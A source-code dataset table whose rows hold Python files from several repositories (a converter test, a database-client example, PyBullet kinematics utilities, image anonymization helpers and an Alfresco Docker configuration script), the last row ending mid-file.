hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b2d8531598d9aed3244b9e32b3471f4b1cb73d1f | 617 | py | Python | back/tests/test_converters.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/test_converters.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/test_converters.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | from converters import JSONConverter
from . import mock_db
def test_json_converter():
"""Test Empty-Graph"""
g = mock_db.graph_empty
converter = JSONConverter()
encoded_g = converter.encode(g)
assert encoded_g == '{"nodes": [], "edges": [], "attributes": {}}'
"""Test A-B-Graph"""
g = mock_db.graph_a_b
converter = JSONConverter()
encoded_g = converter.encode(g)
print(type(encoded_g), encoded_g)
assert '{"data": {"id": "node_a", "a": 1}}' in encoded_g
assert '[{"data": {"id": "node_a_node_b", "source": "node_a", "target": "node_b", "a": 1}}]' in encoded_g
| 24.68 | 109 | 0.619125 | 84 | 617 | 4.297619 | 0.357143 | 0.155125 | 0.055402 | 0.066482 | 0.531856 | 0.393352 | 0.393352 | 0 | 0 | 0 | 0 | 0.004024 | 0.194489 | 617 | 24 | 110 | 25.708333 | 0.722334 | 0.025932 | 0 | 0.307692 | 0 | 0.076923 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2d9e6a913ef8ff911ce6ea6cb8509a91b4760c9 | 1,597 | py | Python | mysql_example.py | knlambert/sqlcollection | bd5408c00e62c5284de8a70743a28032bbfaf9ba | [
"MIT"
] | null | null | null | mysql_example.py | knlambert/sqlcollection | bd5408c00e62c5284de8a70743a28032bbfaf9ba | [
"MIT"
] | null | null | null | mysql_example.py | knlambert/sqlcollection | bd5408c00e62c5284de8a70743a28032bbfaf9ba | [
"MIT"
] | null | null | null | # coding utf-8
from sqlcollection import Client
# import logging
# logging.basicConfig()
# logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
#
# lookup=[
# {
# u"to": u"hour",
# u"localField": u"project",
# u"from": u"project",
# u"foreignField": u"id",
# u"as": u"project"
# }, {
# u"to": u"project",
# u"localField": u"client",
# u"from": u"client",
# u"foreignField": u"id",
# u"as": u"project.client"
# }
# ]
import json
import datetime
client = Client(url=u'mysql+mysqlconnector://root:localroot1234@127.0.0.1/')
user = client.user_api._user
description = user.get_description(auto_lookup=3)
print(json.dumps(description, indent=4))
cursor = user.find(query={}, auto_lookup=1).sort(u"id").limit(2).skip(0)
for item in cursor:
print(item)
#
# print(u"___count")
# count = hour.find(auto_lookup=0).limit(3).count()
# print(count)
#
# print(u"___count with_limit_and_skip")
# count = hour.find(auto_lookup=0).limit(3).count(with_limit_and_skip=True)
# print(count)
# quit()
#
# ret = user.insert_one({
# "email": "test2",
# "name": "test",
# "hash": "test",
# "salt": "test",
# "customer_id": {
# "id": 1
# }
# }, auto_lookup=1)
# print(ret.inserted_id)
# #
ret = user.delete_many({
u"customer_id.id": 2
}, auto_lookup=3)
#
# ret = hour.update_many({
# u"project.id": 2
# }, {
# u"$set": {
# u"issue": u"updated",
# u"project": {
# u"id": 1
# }
# }
# }, auto_lookup=3)
| 22.180556 | 76 | 0.562304 | 209 | 1,597 | 4.162679 | 0.358852 | 0.064368 | 0.051724 | 0.036782 | 0.185057 | 0.142529 | 0.142529 | 0.142529 | 0.08046 | 0 | 0 | 0.023083 | 0.240451 | 1,597 | 71 | 77 | 22.492958 | 0.694147 | 0.657483 | 0 | 0 | 0 | 0 | 0.137931 | 0.105477 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.230769 | 0 | 0.230769 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2dcd6dd9f58b630450aff63b110100216ce85b7 | 7,260 | py | Python | pyreach/ik_pybullet/ik_pybullet.py | google-research/pyreach | f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159 | [
"Apache-2.0"
] | 13 | 2021-09-01T01:10:22.000Z | 2022-03-05T10:01:52.000Z | pyreach/ik_pybullet/ik_pybullet.py | google-research/pyreach | f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159 | [
"Apache-2.0"
] | null | null | null | pyreach/ik_pybullet/ik_pybullet.py | google-research/pyreach | f91753ce7a26e77e122eb02a9fdd5a1ce3ce0159 | [
"Apache-2.0"
] | 6 | 2021-09-20T21:17:53.000Z | 2022-03-14T18:42:48.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for PyBullet IK."""
import os
import sys
from typing import Any
from absl import logging # type: ignore
import numpy as np # type: ignore
import six
from pyreach.common.base import transform_util
import pybullet # type: ignore
import pybullet_data # type: ignore
import pybullet_utils.bullet_client as bullet_client # type: ignore
XARM_URDF_PATH = ('third_party/bullet/examples/pybullet/gym/pybullet_data/'
'xarm/xarm6_robot.urdf')
def _load_g3_resources(load_fn: Any, file_path: str, *args: Any,
**kwargs: Any) -> Any:
"""Wraps the PyBullet loadURDF to support g3 resource loading.
May need to write to local file system. So make sure tmpfs is enabled on
Borg.
Args:
load_fn: A function to load the file.
file_path: the file to be loaded.
*args: Other arguments. Check PyBullet documentation for details.
**kwargs: Other keyward arguments. Check PyBullet documentation for details.
Returns:
The unique URDF id if successful.
"""
g3_file_path = file_path
if not six.ensure_str(g3_file_path).startswith('google3/'):
g3_file_path = os.path.join('google3', g3_file_path)
file_dir_name = os.path.dirname(g3_file_path)
# Using `skip_previous_extraction_check` since we are using the
# `filename_predicate`.
# flake8: noqa
root_dir = resources.GetARootDirWithAllResources( # type: ignore
filename_predicate=lambda x: file_dir_name in x,
skip_previous_extraction_check=True)
g3_file_path = os.path.join(root_dir, g3_file_path)
return load_fn(g3_file_path, *args, **kwargs)
def load_urdf(pybullet_client: Any, file_path: str, *args: Any,
**kwargs: Any) -> Any:
"""Loads the given URDF filepath in g3 and borg."""
if file_path.startswith('google3/'):
file_path = file_path[len('google3/'):]
# Handles most general file open case (blaze build and execute in code tree,
# or running unit tests) and CNS case if enable_cns() is called.
try:
if os.path.exists(file_path):
return pybullet_client.loadURDF(file_path, *args, **kwargs)
except pybullet_client.error:
pass
# Handles the PAR case and blaze run case. Unlikely if path is absolute.
if not file_path.startswith('/'):
try:
if os.path.exists(file_path):
return pybullet_client.loadURDF(
os.path.join('google3', file_path), *args, **kwargs)
except pybullet.error:
pass
if 'google3.pyglib.resources' in sys.modules:
try:
# Big Hammer.
return _load_g3_resources(pybullet_client.loadURDF, file_path, *args,
**kwargs)
except pybullet.error:
raise FileNotFoundError('Cannot load the URDF file {}'.format(file_path))
else:
# Handles project-reach case.
try:
if file_path.startswith(
'third_party/bullet/examples/pybullet/gym/pybullet_data/'):
pybullet_client.setAdditionalSearchPath(pybullet_data.getDataPath())
file_path = file_path[55:]
elif file_path.startswith('robotics/'):
pybullet_client.setAdditionalSearchPath(os.environ['PYTHONPATH'])
file_path = file_path[9:]
logging.info('Loading URDF %s', file_path)
return pybullet_client.loadURDF(file_path, *args, **kwargs)
except pybullet.error:
raise FileNotFoundError('Cannot load the URDF file {}'.format(file_path))
class IKPybullet:
"""PyBullet IK."""
def __init__(self) -> None:
self._connection_mode = pybullet.DIRECT
self._pybullet_client = bullet_client.BulletClient(self._connection_mode)
self._effector_link = 6
self._arm_urdf = load_urdf(self._pybullet_client, XARM_URDF_PATH, [0, 0, 0])
joints = []
joint_indices = []
for i in range(self._pybullet_client.getNumJoints(self._arm_urdf)):
joint_info = self._pybullet_client.getJointInfo(self._arm_urdf, i)
if joint_info[2] == pybullet.JOINT_REVOLUTE:
joints.append(joint_info[0])
joint_indices.append(i)
self._n_joints = len(joints)
self._joints = tuple(joints)
self._joint_indices = tuple(joint_indices)
def _set_joints(self, joints_values: np.ndarray) -> None:
for i in range(self._n_joints):
self._pybullet_client.resetJointState(self._arm_urdf, self._joints[i],
joints_values[i])
def _get_joints(self) -> np.ndarray:
joint_states = self._pybullet_client.getJointStates(self._arm_urdf,
self._joint_indices)
joint_positions = np.array([state[0] for state in joint_states])
return joint_positions
def ik_search(self, target_effector_pose: np.ndarray,
current_joints: np.ndarray) -> np.ndarray:
"""Inverse kinematics.
Args:
target_effector_pose: Target pose for the robot's end effector.
current_joints: The current joints of the robot.
Returns:
Numpy array with required joint angles to reach the requested pose.
"""
self._set_joints(current_joints)
translation = target_effector_pose[0:3]
quaternion_xyzw = transform_util.axis_angle_to_quaternion(
target_effector_pose[3:])
target_joints = np.array(
self._pybullet_client.calculateInverseKinematics(
self._arm_urdf,
self._effector_link,
translation,
quaternion_xyzw,
# TODO: use real limits. pylint: disable=g-bad-todo
lowerLimits=[-17] * 6,
upperLimits=[17] * 6,
jointRanges=[17] * 6,
# pylint: disable=g-bad-todo
# TODO: Understand why examples don't use actual positions for
# the first two joints. Taken from
# `pybullet/gym/pybullet_robots/xarm/xarm_sim.py`
restPoses=[0, 0] + self._get_joints()[2:].tolist(),
maxNumIterations=500,
residualThreshold=1e-4))
self._set_joints(target_joints)
return target_joints
def fk(self, current_joints: np.ndarray) -> np.ndarray:
"""Forward kinematics.
Args:
current_joints: The current joints of the robot.
Returns:
Numpy array with the t pose.
"""
self._set_joints(current_joints)
ee_link_state = self._pybullet_client.getLinkState(
self._arm_urdf, self._effector_link, 0, computeForwardKinematics=True)
ee_link_pose = np.array(ee_link_state[4] + ee_link_state[5])
quaternion_xyzw = np.asarray(
[ee_link_pose[3], ee_link_pose[4], ee_link_pose[5], ee_link_pose[6]])
pose = transform_util.pos_quaternion_to_pose(ee_link_pose[0:3],
quaternion_xyzw)
return pose
| 35.588235 | 80 | 0.681956 | 961 | 7,260 | 4.924037 | 0.304891 | 0.052409 | 0.016906 | 0.019019 | 0.236475 | 0.212806 | 0.14814 | 0.140321 | 0.120456 | 0.106509 | 0 | 0.011901 | 0.224518 | 7,260 | 203 | 81 | 35.763547 | 0.828597 | 0.280579 | 0 | 0.168142 | 0 | 0 | 0.055752 | 0.030428 | 0 | 0 | 0 | 0.004926 | 0 | 1 | 0.061947 | false | 0.017699 | 0.088496 | 0 | 0.230089 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2dcd8252012f561fefda3aeaea2f7eef68802a0 | 2,795 | py | Python | anonympy/images/utils_images.py | ArtLabss/open-data-anonimizer | 48bf790e90718915363b126e40580392cb64e277 | [
"BSD-3-Clause"
] | 29 | 2021-12-20T15:19:44.000Z | 2022-02-07T10:03:57.000Z | anonympy/images/utils_images.py | ArtLabss/open-data-anonimizer | 48bf790e90718915363b126e40580392cb64e277 | [
"BSD-3-Clause"
] | 2 | 2022-02-07T14:52:37.000Z | 2022-03-29T01:50:40.000Z | anonympy/images/utils_images.py | ArtLabss/open-data-anonimizer | 48bf790e90718915363b126e40580392cb64e277 | [
"BSD-3-Clause"
] | 2 | 2021-12-21T05:03:33.000Z | 2022-01-06T17:59:21.000Z | # Supplementary functions and variables
import random
import numpy as np
import cv2
def find_middle(x, y, w, h) -> tuple:
'''
Function for finding the center of a rectangle
The center of rectangle is the midpoint of the diagonal end points of
rectangle.
'''
x1, y1 = x, y
x2, y2 = x + w, y + h
m1, m2 = int((x1 + x2)/2), int((y1 + y2)/2)
return m1, m2
def find_radius(x, y, w, h) -> tuple:
'''
Function finds the distance between the center and side edge
'''
side_middle = x + w, (y + y + h) / 2
center = find_middle(x, y, w, h)
dis = side_middle[0] - center[0]
return dis
def sap_noise(frame, seed=None):
random.seed(seed)
img = frame.copy()
# Getting the dimensions of the image
row, col, _ = img.shape
# Randomly pick some pixels in the
# image for coloring them white
# Pick a random number between 300 and 10000
number_of_pixels = random.randint(8000, 15000)
for i in range(number_of_pixels):
# Pick a random y coordinate
y_coord = random.randint(0, row - 1)
# Pick a random x coordinate
x_coord = random.randint(0, col - 1)
# Color that pixel to white
img[y_coord][x_coord] = 255
# Randomly pick some pixels in
# the image for coloring them black
# Pick a random number between 300 and 10000
number_of_pixels = random.randint(8000, 15000)
for i in range(number_of_pixels):
# Pick a random y coordinate
y_coord = random.randint(0, row - 1)
# Pick a random x coordinate
x_coord = random.randint(0, col - 1)
# Color that pixel to black
img[y_coord][x_coord] = 0
return img
def pixelated(image, blocks=20):
(h, w) = image.shape[:2]
xSteps = np.linspace(0, w, blocks + 1, dtype="int")
ySteps = np.linspace(0, h, blocks + 1, dtype="int")
for i in range(1, len(ySteps)):
for j in range(1, len(xSteps)):
# compute the starting and ending (x, y)-coordinates
# for the current block
startX = xSteps[j - 1]
startY = ySteps[i - 1]
endX = xSteps[j]
endY = ySteps[i]
# extract the ROI using NumPy array slicing, compute the
# mean of the ROI, and then draw a rectangle with the
# mean RGB values over the ROI in the original image
roi = image[startY:endY, startX:endX]
(B, G, R) = [int(x) for x in cv2.mean(roi)[:3]]
cv2.rectangle(image, (startX, startY), (endX, endY), (B, G, R), -1)
return image
def resize(self, new_width=500):
height, width, _ = self.frame.shape
ratio = height / width
new_height = int(ratio * new_width)
return cv2.resize(self.frame, (new_width, new_height))
| 32.126437 | 79 | 0.602147 | 424 | 2,795 | 3.900943 | 0.304245 | 0.018138 | 0.039903 | 0.045949 | 0.356711 | 0.338573 | 0.303507 | 0.303507 | 0.303507 | 0.303507 | 0 | 0.042111 | 0.294812 | 2,795 | 86 | 80 | 32.5 | 0.797057 | 0.310197 | 0 | 0.170213 | 0 | 0 | 0.003207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0 | 0.06383 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2dd5fc08ae790d026fe0c35d53a86396def0913 | 808 | py | Python | profile_generator/feature/tone/contrast/local/schema/schema.py | nethy/profile-generator | 9bc54bed36b84b45902d75a273739480b4ff2204 | [
"MIT"
] | null | null | null | profile_generator/feature/tone/contrast/local/schema/schema.py | nethy/profile-generator | 9bc54bed36b84b45902d75a273739480b4ff2204 | [
"MIT"
] | null | null | null | profile_generator/feature/tone/contrast/local/schema/schema.py | nethy/profile-generator | 9bc54bed36b84b45902d75a273739480b4ff2204 | [
"MIT"
] | null | null | null | from collections.abc import Mapping
from typing import Any
from profile_generator.model.view import raw_therapee
from profile_generator.model.view.raw_therapee import EqPoint
from profile_generator.schema import object_of, range_of
_WL_ENABLED = "WaveletEnabled"
_WL_CURVE = "WaveletOpacityCurveWL"
_DEFAULT_LOCAL_CONTRAST = 0
def _process(data: Any) -> Mapping[str, str]:
value = data.get("local", _DEFAULT_LOCAL_CONTRAST)
amount = 0.5 + 0.05 * value
curve = raw_therapee.CurveType.STANDARD + raw_therapee.present_equalizer(
(EqPoint(0, 0.5), EqPoint(0.25, amount), EqPoint(0.75, amount), EqPoint(1, 0.5))
)
enabled = str(value > _DEFAULT_LOCAL_CONTRAST).lower()
return {_WL_ENABLED: enabled, _WL_CURVE: curve}
SCHEMA = object_of({"local": range_of(0, 10)}, _process)
| 32.32 | 88 | 0.747525 | 113 | 808 | 5.070796 | 0.40708 | 0.076789 | 0.104712 | 0.08726 | 0.101222 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030347 | 0.143564 | 808 | 24 | 89 | 33.666667 | 0.797688 | 0 | 0 | 0 | 0 | 0 | 0.055693 | 0.02599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.294118 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ddaa7376cc318fcf695eb03b2656615025fd00 | 29,440 | py | Python | assets/init.py | wangmuy/docker-alfresco | a37802125f29e86d1247ed2ed6ae77e5789fa079 | [
"MIT"
] | null | null | null | assets/init.py | wangmuy/docker-alfresco | a37802125f29e86d1247ed2ed6ae77e5789fa079 | [
"MIT"
] | null | null | null | assets/init.py | wangmuy/docker-alfresco | a37802125f29e86d1247ed2ed6ae77e5789fa079 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import json
import os
import re
import shutil
import sys
import time
__author__ = 'Sebastien LANGOUREAUX'
ALFRESCO_PATH = '/opt/alfresco'
ALFRESCO_GLOBAL_BAK = ALFRESCO_PATH + '/alf_data/alfresco-global.properties.bak'
ALFRESCO_LDAP_BAK = ALFRESCO_PATH + '/alf_data/ldap-authentication.properties.bak'
class ServiceRun():
skipSetupGlobal = False
skipSetupLdap = False
def set_database_connection(self, db_type, db_host, db_port, db_name, db_user, db_password):
global ALFRESCO_PATH
if db_type not in ["postgresql", "mysql"]:
raise KeyError("DB type must be Postgresql or Mysql")
if db_type == "mysql" and (db_host == "localhost" or db_host == "127.0.0.1"):
raise KeyError("For local database, you must use Postgresql")
if db_host != "localhost" and db_host != "127.0.0.1":
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autostart\s*=.*', 'autostart=false')
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autorestart\s*=.*', 'autorestart=false')
else:
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autostart\s*=.*', 'autostart=true')
self.replace_all('/etc/supervisor/conf.d/supervisord-postgresql.conf', 'autorestart\s*=.*', 'autorestart=true')
if self.skipSetupGlobal == True:
return
if db_host is None or db_host == "":
raise KeyError("You must provide db_host")
if db_port is None or db_port == "":
raise KeyError("You must provide db_port")
if db_name is None or db_name == "":
raise KeyError("You must provide db_name")
if db_user is None or db_user == "":
raise KeyError("You must provide db_user")
if db_password is None or db_password == "":
raise KeyError("You must provide db_password")
db_conn_params = ""
if db_type == "mysql":
db_conn_params = "?useSSL=false"
db_driver = "org.gjt.mm.mysql.Driver"
else:
db_driver = "org.postgresql.Driver"
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.driver\s*=.*', 'db.driver=' + db_driver)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.username\s*=.*', 'db.username=' + db_user)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.password\s*=.*', 'db.password=' + db_password)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.name\s*=.*', 'db.name=' + db_name)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'db.url\s*=.*', 'db.url=jdbc:' + db_type + '://' + db_host + ':' + db_port + '/' + db_name + db_conn_params)
def set_alfresco_context(self, host, port, protocol):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if host is None or host == "":
raise KeyError("You must provide host")
if port is None or port == "":
raise KeyError("You must provide port")
if protocol is None or protocol == "":
raise KeyError("You must provide protocol")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.host\s*=.*', 'alfresco.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.port\s*=.*', 'alfresco.port=' + port)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.protocol\s*=.*', 'alfresco.protocol=' + protocol)
def set_share_context(self, host, port, protocol):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if host is None or host == "":
raise KeyError("You must provide host")
if port is None or port == "":
raise KeyError("You must provide port")
if protocol is None or protocol == "":
raise KeyError("You must provide protocol")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'share.host\s*=.*', 'share.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'share.port\s*=.*', 'share.port=' + port)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'share.protocol\s*=.*', 'share.protocol=' + protocol)
def set_ftp(self, enable, port):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if port is None or port == "":
raise KeyError("You must provide port")
if enable not in ["true", "false"]:
raise KeyError("Enable must be true or false")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'ftp.enabled\s*=.*', 'ftp.enabled=' + enable)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'ftp.port\s*=.*', 'ftp.port=' + port)
def set_core(self, environment):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if environment not in ["UNKNOWN", "TEST", "BACKUP", "PRODUCTION"]:
raise KeyError("Environment must be UNKNOWN, TEST, BACKUP or PRODUCTION")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'system.serverMode\s*=.*', 'system.serverMode=' + environment)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'alfresco.authentification.allowGuestLogin\s*=.*', 'alfresco.authentification.allowGuestLogin=false')
def set_mail(self, host, port, user, password, protocol, starttls_enable, mail_sender):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if host is not None and host != "":
if port is None or port == "":
raise KeyError("You must provide port")
if protocol is None or protocol == "":
raise KeyError("You must provide protocol")
if mail_sender is None or mail_sender =="":
raise KeyError("You must provide the mail sender")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.host\s*=.*', 'mail.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.port\s*=.*', 'mail.port=' + port)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.protocol\s*=.*', 'mail.protocol=' + protocol)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.from.default\s*=.*', 'mail.from.default=' + mail_sender)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.from.enabled\s*=.*', 'mail.from.enabled=false')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.host\s*=', '#mail.host=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.port\s*=', '#mail.port=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.protocol\s*=', '#mail.protocol=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.from.default\s*=', 'mail.from.default=')
if user is not None and user != "":
if password is None or password == "":
raise KeyError("You must provide password")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.username\s*=.*', 'mail.username=' + user)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.password\s*=.*', 'mail.password=' + password)
if protocol == "smtp":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.auth\s*=.*', 'mail.smtp.auth=false')
if starttls_enable == "true":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.starttls.enable\s*=.*', 'mail.smtp.starttls.enable=true')
